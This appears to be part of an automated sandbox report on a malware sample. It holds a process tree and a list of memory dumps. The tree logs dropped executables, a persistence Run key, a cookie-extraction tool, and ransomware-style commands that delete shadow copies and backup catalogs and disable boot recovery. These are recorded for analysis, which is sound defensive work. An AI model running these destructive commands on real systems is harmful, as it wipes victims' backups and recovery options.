                                                                                              PID:5900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:6012
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:6112
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1540
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                              PID:5916
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4744
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6084
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4076
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:2148
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4616
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4680
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4552
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:5016
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:6128
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:2220
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:4852
                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                          1⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:5324
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          PID:5596
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1672.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1672.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5928
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:3996
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:4776
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4992
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4588
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4460
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5256
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5300
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5292
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:4704
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:5868
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                        1⤵
                                                                                                          PID:5644
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8C72.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\8C72.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Enumerates connected drives
                                                                                                          PID:2740
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 828
                                                                                                            2⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Program crash
                                                                                                            PID:2096
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 840
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5748
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 868
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4532
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1016
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4900
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1120
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4244
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1168
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3740
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1288
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4220
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1580
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1848
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1624
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:920
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1668
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3708
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1816
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3928
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1856
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5784
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1712
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1752
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1816
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1564
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                            2⤵
                                                                                                              PID:1592
                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                wmic shadowcopy delete
                                                                                                                3⤵
                                                                                                                  PID:200
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                2⤵
                                                                                                                  PID:5116
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                  2⤵
                                                                                                                    PID:5956
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                    2⤵
                                                                                                                      PID:5888
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                      2⤵
                                                                                                                        PID:5728
                                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                          vssadmin delete shadows /all /quiet
                                                                                                                          3⤵
                                                                                                                          • Interacts with shadow copies
                                                                                                                          PID:5348
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                        2⤵
                                                                                                                          PID:5144
                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                            wmic shadowcopy delete
                                                                                                                            3⤵
                                                                                                                              PID:4916
                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                                              3⤵
                                                                                                                              • Interacts with shadow copies
                                                                                                                              PID:5852
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8C72.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\8C72.exe" -agent 0
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:4780
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1980
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4204
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 2004
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5472
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            notepad.exe
                                                                                                                            2⤵
                                                                                                                              PID:5704
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9491.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9491.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3180
                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                            1⤵
                                                                                                                              PID:4108
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:2136
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:4196
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:828
                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  PID:5768
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:700
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5572
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4824

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • memory/60-163-0x00000221E1DA0000-0x00000221E1E10000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/688-187-0x00000000007E0000-0x00000000007E1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/688-189-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/688-190-0x0000000002360000-0x0000000002362000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/688-188-0x00000000007F0000-0x000000000080C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  112KB

                                                                                                                                • memory/688-185-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/708-193-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/1028-171-0x0000012E5A400000-0x0000012E5A470000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1028-272-0x0000012E5A220000-0x0000012E5A26B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  300KB

                                                                                                                                • memory/1028-273-0x0000012E5A4E0000-0x0000012E5A550000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1104-269-0x000002303EF70000-0x000002303EFE0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1104-169-0x000002303E2B0000-0x000002303E320000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1224-177-0x0000023396D60000-0x0000023396DD0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1224-147-0x0000023396AC0000-0x0000023396AC2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1224-287-0x0000023396AC0000-0x0000023396AC2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1224-290-0x00000233977B0000-0x0000023397820000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1392-293-0x0000027288980000-0x00000272889F0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1392-179-0x0000027288860000-0x00000272888D0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1456-223-0x0000000002870000-0x0000000002872000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/1468-277-0x0000019D25200000-0x0000019D25270000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1468-173-0x0000019D24FD0000-0x0000019D25040000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1884-175-0x000001CDDE810000-0x000001CDDE880000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/1884-284-0x000001CDDF240000-0x000001CDDF2B0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2068-203-0x0000000002C30000-0x0000000002C32000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2148-205-0x0000027EAC800000-0x0000027EAC8FF000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1020KB

                                                                                                                                • memory/2148-161-0x0000027EAA240000-0x0000027EAA2B0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2260-208-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  88KB

                                                                                                                                • memory/2300-199-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2384-123-0x000000000400E000-0x000000000410F000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                • memory/2384-124-0x00000000028C0000-0x000000000296E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  696KB

                                                                                                                                • memory/2484-165-0x00000297CB540000-0x00000297CB5B0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2504-238-0x0000000000CF5000-0x0000000000CF7000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2504-236-0x0000000000CF4000-0x0000000000CF5000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2504-229-0x0000000000CF2000-0x0000000000CF4000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2504-222-0x0000000000CF0000-0x0000000000CF2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/2532-167-0x000002BBCA740000-0x000002BBCA7B0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2688-181-0x000001A8E3E60000-0x000001A8E3ED0000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2696-157-0x0000025BCB390000-0x0000025BCB400000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/2936-160-0x000001EBF4410000-0x000001EBF4480000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/3392-213-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4076-156-0x000002D0E7290000-0x000002D0E7300000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  448KB

                                                                                                                                • memory/4076-152-0x000002D0E71D0000-0x000002D0E721B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  300KB

                                                                                                                                • memory/4076-126-0x000002D0E6EF0000-0x000002D0E6EF2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4076-262-0x000002D0E6EF0000-0x000002D0E6EF2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4124-239-0x0000000002805000-0x0000000002806000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/4124-237-0x0000000002802000-0x0000000002804000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4124-228-0x0000000002800000-0x0000000002802000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  8KB

                                                                                                                                • memory/4220-233-0x0000000000970000-0x000000000097D000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  52KB

                                                                                                                                • memory/4220-268-0x0000000003440000-0x0000000003488000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  288KB

                                                                                                                                • memory/5004-245-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/5004-246-0x0000000000590000-0x00000000005A2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/5116-278-0x0000000000870000-0x00000000009BA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1.3MB

                                                                                                                                • memory/5324-286-0x0000000004800000-0x000000000485C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  368KB

                                                                                                                                • memory/5324-270-0x0000000004629000-0x000000000472A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                • memory/5628-294-0x0000000000400000-0x0000000000447000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  284KB

                                                                                                                                • memory/5628-283-0x0000000000400000-0x0000000000447000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  284KB

                                                                                                                                • memory/5840-349-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/5920-299-0x0000000140000000-0x0000000140383000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  3.5MB

                                                                                                                                • memory/6132-304-0x0000000140000000-0x000000014070A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  7.0MB

                                                                                                                                • memory/6132-306-0x000002653C9E0000-0x000002653C9F4000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  80KB